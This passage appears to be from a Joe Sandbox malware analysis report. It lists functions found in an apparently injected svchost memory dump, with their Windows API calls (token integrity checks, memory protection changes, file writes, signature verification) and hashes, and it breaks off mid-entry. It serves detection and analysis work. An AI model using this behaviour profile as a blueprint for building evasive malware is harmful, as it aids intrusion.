Opcode ID: 9c60a945238cc490935f539e8b9157b421c86364015fd81c85327ad74476a634
Instruction ID: 37340533616df8392ec2e4b7aeeee8df19fa537bd9adb58765a2505ab51bc946
Opcode Fuzzy Hash: 9c60a945238cc490935f539e8b9157b421c86364015fd81c85327ad74476a634
Instruction Fuzzy Hash: A251E131A44306AFD7129F28C949B6AFBA4FF46794F08499EF684C3251C731D548EB62

Uniqueness

Uniqueness Score: -1.00%

Function 02F73555 Relevance: 15.1, APIs: 10, Instructions: 76
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02F73570
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02F73585
GetLastError.KERNEL32 ref: 02F7358B
GetProcessHeap.KERNEL32(00000008,00000001), ref: 02F735A1
RtlAllocateHeap.NTDLL(00000000), ref: 02F735A8
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02F735C1
GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 02F735CF
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02F735F0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F735FD
HeapFree.KERNEL32(00000000), ref: 02F73604

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessToken$Information$AllocateAuthorityChangeCloseErrorFindFreeLastNotificationOpen
String ID:
API String ID: 1063018014-0
Opcode ID: 0d59f59b2ff465bd0092bfd09fc0a47d485622ea69de440ff695e00518bcc1c5
Instruction ID: d52a18393596e07ed6fdf29e85a8eb6dcfb1312b27d8dc6c4ade76244c4b1922
Opcode Fuzzy Hash: 0d59f59b2ff465bd0092bfd09fc0a47d485622ea69de440ff695e00518bcc1c5
Instruction Fuzzy Hash: 81219F31E90209FBEB215B54DD09FAEFB38FB41B96F140596F601D6190C7718A14EB60

Uniqueness

Uniqueness Score: -1.00%

Function 02F72DAF Relevance: 12.1, APIs: 8, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,02F751B9,?,02F770E8,00000000,00000000,?), ref: 02F72DC8
GetFileSize.KERNEL32(00000000,00000000,?,?,02F751B9,?,02F770E8,00000000,00000000,?,00000000), ref: 02F72DDC
CloseHandle.KERNEL32(00000000,?,02F751B9,?,02F770E8,00000000,00000000,?,00000000), ref: 02F72E4D

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 7564b249e869f74066009456905fa98fcbdab8569180f0e16f23a3560329ca13
Instruction ID: 80d4aa70b681e97c813fc6d9ec32d4ada3d0dfb1cf5b8de38807b5cf551706b5
Opcode Fuzzy Hash: 7564b249e869f74066009456905fa98fcbdab8569180f0e16f23a3560329ca13
Instruction Fuzzy Hash: 38116071A54225AFE7215F60EC48F6BFF68FB4AAE1F00491AFE42D6190D730C515CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F74068 Relevance: 12.1, APIs: 8, Instructions: 63
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000009,?,02F7373D,?,00100000,00000006,?), ref: 02F7406D
RtlAllocateHeap.NTDLL(00000000,?,02F7373D), ref: 02F74074
CreateFileMappingW.KERNELBASE(000000FF,02F762B8,00000004,00000000,?,?,?,?,?,02F7373D,?,00100000,00000006,?), ref: 02F7409B
GetLastError.KERNEL32(?,?,?,02F7373D,?,00100000,00000006,?), ref: 02F740A7
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,?,?,?,?,02F7373D,?,00100000,00000006,?), ref: 02F740C6
CloseHandle.KERNEL32(00000000,?,?,?,02F7373D,?,00100000,00000006,?), ref: 02F740D5
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,02F7373D,?,00100000,00000006,?), ref: 02F740DE
HeapFree.KERNEL32(00000000,?,?,?,02F7373D,?,00100000,00000006,?), ref: 02F740E5

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$AllocateCloseCreateErrorFreeHandleLastMappingView
String ID:
API String ID: 3951456143-0
Opcode ID: 53d4b772879d4d90311a572edabbf03f9e062017508b683499d875277284c677
Instruction ID: 09138d365a57d91503b908a72254781aedac4d4df58345f09dba021db4524981
Opcode Fuzzy Hash: 53d4b772879d4d90311a572edabbf03f9e062017508b683499d875277284c677
Instruction Fuzzy Hash: 45118275684306AFE721AF64EC48F16FBE8FF08B91F058829F655D6291DB70D814CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02F71FE9 Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F71FF0
CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02F72009
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02F72014
CloseHandle.KERNEL32 ref: 02F72025

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: CloseCreate$ChangeEventFindHandleNotificationThread
String ID:
API String ID: 3181087867-0
Opcode ID: c0eb1236571bf2efaa77245dc4d3fad25d017fc0a01e9be67868d1dbb696d928
Instruction ID: 232005a9cec81f5032e26fa1d7a623a5b1c6adae47888eb83c7aa34fdc240dd2
Opcode Fuzzy Hash: c0eb1236571bf2efaa77245dc4d3fad25d017fc0a01e9be67868d1dbb696d928
Instruction Fuzzy Hash: 51E09A71AA66356AA6316B767C0CDC7BE9DEF0AAE53014D22B909D0108D7608469C6F4

Uniqueness

Uniqueness Score: -1.00%

Function 02F726ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02F72709
RtlGetVersion.NTDLL(?), ref: 02F7271E

Part of subcall function 02F73641: GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02F72790), ref: 02F73659

Strings

f<v, xrefs: 02F727BD

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersionmemset
String ID: f<v
API String ID: 487673674-2911902482
Opcode ID: af8f4671c165e0b08e22834f3a5b1f69a90b927005f610dc1c05bde3d1e0a019
Instruction ID: d1c2e7bd72e194bb631f82d4f82d2c240c80597d325b86b6d95da8d17d53ae30
Opcode Fuzzy Hash: af8f4671c165e0b08e22834f3a5b1f69a90b927005f610dc1c05bde3d1e0a019
Instruction Fuzzy Hash: 6521C536D846AC5ADF919BB4AD45AD6BF6C9B363C0F0408E6DA44D3202D360452DCBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02F7492A Relevance: 5.1, APIs: 4, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,02F770E8), ref: 02F74982
HeapFree.KERNEL32(00000000,?,00000000,00000000,02F770E8), ref: 02F74989
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,02F770E8), ref: 02F749B1
HeapFree.KERNEL32(00000000,?,00000000,00000000,02F770E8), ref: 02F749B8

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: bf5418ce812988a122fd6b1fd01c11545c051be70cba84959feed064d4a06d15
Instruction ID: 18b1cc12276b51beca68bb88e52642fde583fdfa3a8483d6c043d003a193796f
Opcode Fuzzy Hash: bf5418ce812988a122fd6b1fd01c11545c051be70cba84959feed064d4a06d15
Instruction Fuzzy Hash: 5311E376D44208BBDB10DBA4D814BEEF7BCFB48795F044556EE44D6140E7709618CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02F72C33 Relevance: 4.6, APIs: 3, Instructions: 74
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(02F763B4,?), ref: 02F72C67

Part of subcall function 02F755BC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 02F755D3
Part of subcall function 02F755BC: CreateDirectoryW.KERNELBASE(?,02F762B8), ref: 02F7561C

Part of subcall function 02F72D40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F72D86
Part of subcall function 02F72D40: RtlFreeHeap.NTDLL(00000000), ref: 02F72D8D

lstrcpyW.KERNEL32(02F763B4,?), ref: 02F72CC7
lstrcatW.KERNEL32(?,02F7738C), ref: 02F72CD9

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CreateDirectoryFolderFreePathProcesslstrcatlstrcpy
String ID:
API String ID: 2199617466-0
Opcode ID: 5982038b6186cbf0a6d824c52137178f2023bd226749ae8eed5cd1e161b6ae4c
Instruction ID: 72aea3262a664c15accb142e24ed0a07e3b67ca264aa71644395a4ca5af0ea5a
Opcode Fuzzy Hash: 5982038b6186cbf0a6d824c52137178f2023bd226749ae8eed5cd1e161b6ae4c
Instruction Fuzzy Hash: A021F9B294021C9FDF50EFA4DC49BDAB7BCEB08384F44046BEA09E2151EB309658CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02F72833 Relevance: 4.6, APIs: 3, Instructions: 73
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExW.KERNELBASE(00000000,?,?,?,00000005), ref: 02F72858
LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02F7287E
GetSystemTimeAsFileTime.KERNEL32(?,?,00000005), ref: 02F728A3

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: NameTime$AccountComputerFileLookupSystem
String ID:
API String ID: 3076100934-0
Opcode ID: 6d0e1d7375722ea0f235dd3fbdc448dcc6e749ffca7f082c77c821e52917d9f6
Instruction ID: 43211e24a1dc6bf9f23d08c952b52f6dc6fd2d6ab8b8595b2236a93483c27c73
Opcode Fuzzy Hash: 6d0e1d7375722ea0f235dd3fbdc448dcc6e749ffca7f082c77c821e52917d9f6
Instruction Fuzzy Hash: CA21487294164CAFCB65CF29E884DDABBACEB09294B00022AFD55D3242D731D91ECB90

Uniqueness

Uniqueness Score: -1.00%

Function 02F75108 Relevance: 4.6, APIs: 3, Instructions: 52
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F754AC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 02F754C0
Part of subcall function 02F754AC: CreateDirectoryW.KERNELBASE(00000000,02F762B8), ref: 02F75500

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02F7513A
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 02F7515E
CloseHandle.KERNEL32(00000000), ref: 02F75167

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseDirectoryFolderHandlePathRead
String ID:
API String ID: 221032062-0
Opcode ID: 5174fba264e2e59ff589d6d9628b6fd19dfd726ae0d345e1ec8bbb1df811886f
Instruction ID: 2c24d674b5232db50a983667e39b9bec3eec3eae8bb7afbd4772f4405acc5e2b
Opcode Fuzzy Hash: 5174fba264e2e59ff589d6d9628b6fd19dfd726ae0d345e1ec8bbb1df811886f
Instruction Fuzzy Hash: 78012B32A443087FF6305A60EC48F6BB79CE789BF5F504E2AFF51C2080D37165048661

Uniqueness

Uniqueness Score: -1.00%

Function 02F72EBA Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02F72D76,?,?,?,?), ref: 02F72ED5
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,02F72D76,?,?,?,?,?), ref: 02F72EF4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,02F72D76,?,?,?,?,?), ref: 02F72EFD

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: d2c567b3f105b515e562c70c56cf4fe342bc961c36163ef179f2666d3c5761af
Instruction ID: 6864ec8cf4e357eedf0c5f51d694a90b44bf2112906d9820bc79dedd3c578a4e
Opcode Fuzzy Hash: d2c567b3f105b515e562c70c56cf4fe342bc961c36163ef179f2666d3c5761af
Instruction Fuzzy Hash: 3EF06232B55118BBDB205965AC48FABBA6CEB45AF4F004626FE15D3180D370591186F0

Uniqueness

Uniqueness Score: -1.00%

Function 02F72D40 Relevance: 4.5, APIs: 3, Instructions: 43
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F72DAF: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,02F751B9,?,02F770E8,00000000,00000000,?), ref: 02F72DC8

CopyFileW.KERNEL32(?,?,00000000), ref: 02F72DA5

Part of subcall function 02F72EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02F72D76,?,?,?,?), ref: 02F72ED5

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F72D86
RtlFreeHeap.NTDLL(00000000), ref: 02F72D8D

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: File$CreateHeap$CopyFreeProcess
String ID:
API String ID: 2735472767-0
Opcode ID: 43b67c54b7a687234dc21cec87202a25a4cd4a564b50d927129e560937c3ad76
Instruction ID: 9807b50fba5ff7318643b81fdf6eb68fc7def9cbfc1bef672adede4131f0111b
Opcode Fuzzy Hash: 43b67c54b7a687234dc21cec87202a25a4cd4a564b50d927129e560937c3ad76
Instruction Fuzzy Hash: 3D01FF76D50118BBDF126B90DC09FDDBB39EB04791F0045A2FE0AA5150D7328A64EB90

Uniqueness

Uniqueness Score: -1.00%

Function 02F72674 Relevance: 4.5, APIs: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008007), ref: 02F72679

Part of subcall function 02F72973: lstrcpyW.KERNEL32(02F762F2,02F763B4), ref: 02F7298C
Part of subcall function 02F72973: lstrcatW.KERNEL32(02F762F0,02F77338), ref: 02F7299C
Part of subcall function 02F72973: SetUnhandledExceptionFilter.KERNEL32(Function_000017E8), ref: 02F729A7

Part of subcall function 02F726ED: memset.MSVCRT ref: 02F72709
Part of subcall function 02F726ED: RtlGetVersion.NTDLL(?), ref: 02F7271E

Part of subcall function 02F73555: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02F73570
Part of subcall function 02F73555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02F73585
Part of subcall function 02F73555: GetLastError.KERNEL32 ref: 02F7358B
Part of subcall function 02F73555: GetProcessHeap.KERNEL32(00000008,00000001), ref: 02F735A1
Part of subcall function 02F73555: RtlAllocateHeap.NTDLL(00000000), ref: 02F735A8
Part of subcall function 02F73555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02F735C1
Part of subcall function 02F73555: GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 02F735CF
Part of subcall function 02F73555: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02F735F0
Part of subcall function 02F73555: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F735FD
Part of subcall function 02F73555: HeapFree.KERNEL32(00000000), ref: 02F73604

ExitProcess.KERNEL32 ref: 02F726E6

Part of subcall function 02F725E3: lstrcpyW.KERNEL32(?,02F77328), ref: 02F725F6
Part of subcall function 02F725E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02F72612
Part of subcall function 02F725E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02F72623
Part of subcall function 02F725E3: GetLastError.KERNEL32 ref: 02F7262D

Part of subcall function 02F72C33: StrStrIW.KERNELBASE(02F763B4,?), ref: 02F72C67

Part of subcall function 02F71BB9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F71BFF
Part of subcall function 02F71BB9: HeapFree.KERNEL32(00000000), ref: 02F71C06

Part of subcall function 02F71FE9: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F71FF0
Part of subcall function 02F71FE9: CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02F72009
Part of subcall function 02F71FE9: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02F72014

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Create$ErrorEventToken$ChangeCloseFindFreeInformationLastNotificationlstrcpy$AllocateAuthorityExceptionExitFilterModeOpenThreadUnhandledVersionlstrcatmemset
String ID:
API String ID: 179549865-0
Opcode ID: 904a0059b2785e859b605a57144cb002d0ff915065b7ca46116f232f942588da
Instruction ID: 70728f4b5a0d09024e2d790ecd290ff3ecd895343b534a6e01b4bbe2e47fb79d
Opcode Fuzzy Hash: 904a0059b2785e859b605a57144cb002d0ff915065b7ca46116f232f942588da
Instruction Fuzzy Hash: 4DF06D70A803066EEB1037F9AD15B1E722B6F407C6F080863EF45D5184DF2094591E33

Uniqueness

Uniqueness Score: -1.00%

Function 02F729F5 Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ce90224cea8686e61c443d82edc1518ce0edf11116ed92187d08c68b75aca30
Instruction ID: 0cae0ffda5db0e02193090bf9b26537315e645fb2781f7763f5191700cf7e8bd
Opcode Fuzzy Hash: 4ce90224cea8686e61c443d82edc1518ce0edf11116ed92187d08c68b75aca30
Instruction Fuzzy Hash: 74515A76B543069FE314CF68D890EA6B3E8EF88294F05487EFA56C7251E730E908CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02F754AC Relevance: 3.1, APIs: 2, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 02F754C0
CreateDirectoryW.KERNELBASE(00000000,02F762B8), ref: 02F75500

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: 9313f531cbc0201f76b8e32d6b7adbf9d42a3f6fdc3d6617cd718c9133b55661
Instruction ID: e546b7658006bdf7d596fb3f38e6375baf013d474d70ebe60633411811d80b9e
Opcode Fuzzy Hash: 9313f531cbc0201f76b8e32d6b7adbf9d42a3f6fdc3d6617cd718c9133b55661
Instruction Fuzzy Hash: 4D11B6A6A0021C7EF700B7A59C45DFFBBBCDF85A90F10006BFE04D7140E6289A069B71

Uniqueness

Uniqueness Score: -1.00%

Function 02F755BC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 02F755D3
CreateDirectoryW.KERNELBASE(?,02F762B8), ref: 02F7561C

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: 9d137580439c719246bccc085d413f79331785ead4ef6737de2a10024841b456
Instruction ID: 28d45078ef7d560718df102f2e9a68620a99697f456adb7f2a73eaaa641b97b6
Opcode Fuzzy Hash: 9d137580439c719246bccc085d413f79331785ead4ef6737de2a10024841b456
Instruction Fuzzy Hash: 59017972A4021C7EFB1076A5EC89DBFBB7DEB85A94F10001FFE05D2140EE54A9058A71

Uniqueness

Uniqueness Score: -1.00%

Function 02F71BB9 Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F71BFF
HeapFree.KERNEL32(00000000), ref: 02F71C06

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 71accfb19ce0871b057fe95fbc7db0385b8c7b241e8270b99c5cac56aad220a8
Instruction ID: 3f91b981308fa4c3a7b0f8e029177612c29679a7edf99e518bcd17e70c6fdb54
Opcode Fuzzy Hash: 71accfb19ce0871b057fe95fbc7db0385b8c7b241e8270b99c5cac56aad220a8
Instruction Fuzzy Hash: FEF03A76D4020CBBDB00EAE8CD05BDEB77CAB04346F000592FB14E6280E7719628EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F73641 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02F72790), ref: 02F73659

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 6640fb70ca9c9cb1cc300d9fe50d3807cb83d83f90ca36424e34fb98109829f1
Instruction ID: 287c40059c6186a568c09968b0230ff9de4d66791de38287b09fb74a4748f78c
Opcode Fuzzy Hash: 6640fb70ca9c9cb1cc300d9fe50d3807cb83d83f90ca36424e34fb98109829f1
Instruction Fuzzy Hash: 83D0C233A1421C56CB00A6B9A9099CBF7FC9B8C610F0049A6E501E7140E961999442E0

Uniqueness

Uniqueness Score: -1.00%

Function 02F729AE Relevance: 1.3, APIs: 1, Instructions: 22sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02F72BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02F72BDA
Part of subcall function 02F72BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02F72C23

Sleep.KERNELBASE(000000FF), ref: 02F729E9

Part of subcall function 02F72674: SetErrorMode.KERNELBASE(00008007), ref: 02F72679

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual$ErrorModeSleep
String ID:
API String ID: 46048798-0
Opcode ID: dd29538271c6314821828ac7ecd3d803eb013c599f624fe277115051512f9c0c
Instruction ID: adff7ded92e523218cd72e0e14bfb64225b8d6cfaaff2ffdfe58b65988e53889
Opcode Fuzzy Hash: dd29538271c6314821828ac7ecd3d803eb013c599f624fe277115051512f9c0c
Instruction Fuzzy Hash: D8E01A32E101118FDA50AB689D68BD573B46F083D0F0E0A73AE21DB194D720C980EB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02F73E7E Relevance: 12.1, APIs: 8, Instructions: 70encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,02F773C8,00000001,F0000000,00000094,?), ref: 02F73EA1
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,00000001), ref: 02F73EBE
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 02F73ED4
CryptImportKey.ADVAPI32(?,00000000,00000094,00000000,00000000,?), ref: 02F73EF1
CryptVerifySignatureA.ADVAPI32(?,00000000,00000080,00000000,00000000,00000000), ref: 02F73F0D
CryptDestroyKey.ADVAPI32(?), ref: 02F73F18
CryptDestroyHash.ADVAPI32(?), ref: 02F73F26
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02F73F30

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportReleaseSignatureVerify
String ID:
API String ID: 972346567-0
Opcode ID: f559c28c925e865d22e476d61c6feb2aa04a0446a2b3493480aefe8fab2d543e
Instruction ID: 3d0d7a991b8109eabad6e77d7ef1f8512e397b019c5b76a8615826dc5429331c
Opcode Fuzzy Hash: f559c28c925e865d22e476d61c6feb2aa04a0446a2b3493480aefe8fab2d543e
Instruction Fuzzy Hash: AE21ED36D40258BBCB216F96ED08EDFFF79EB85B81F0045A5FA01A2150D7318A24EB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F72F1A Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(02F77658,00000000,00000000,00000001,F0000000,02F762B0,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72F35
CryptCreateHash.ADVAPI32(02F77658,00008003,00000000,00000000,?,00000000,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72F52
CryptHashData.ADVAPI32(?,02F77658,?,00000000,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72F68
CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72F83
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02F75B88,?,00000000,?), ref: 02F72FA3
CryptDestroyHash.ADVAPI32(?,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72FB3
CryptReleaseContext.ADVAPI32(02F77658,00000000,?,?,?,02F75B88,?,00000000,?,?,02F77658,?), ref: 02F72FC2

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDestroyParamRelease
String ID:
API String ID: 276068997-0
Opcode ID: 55f7fcb63cf07257b6c9cfbab15f5b982165def4249c279ba458bd28b637193d
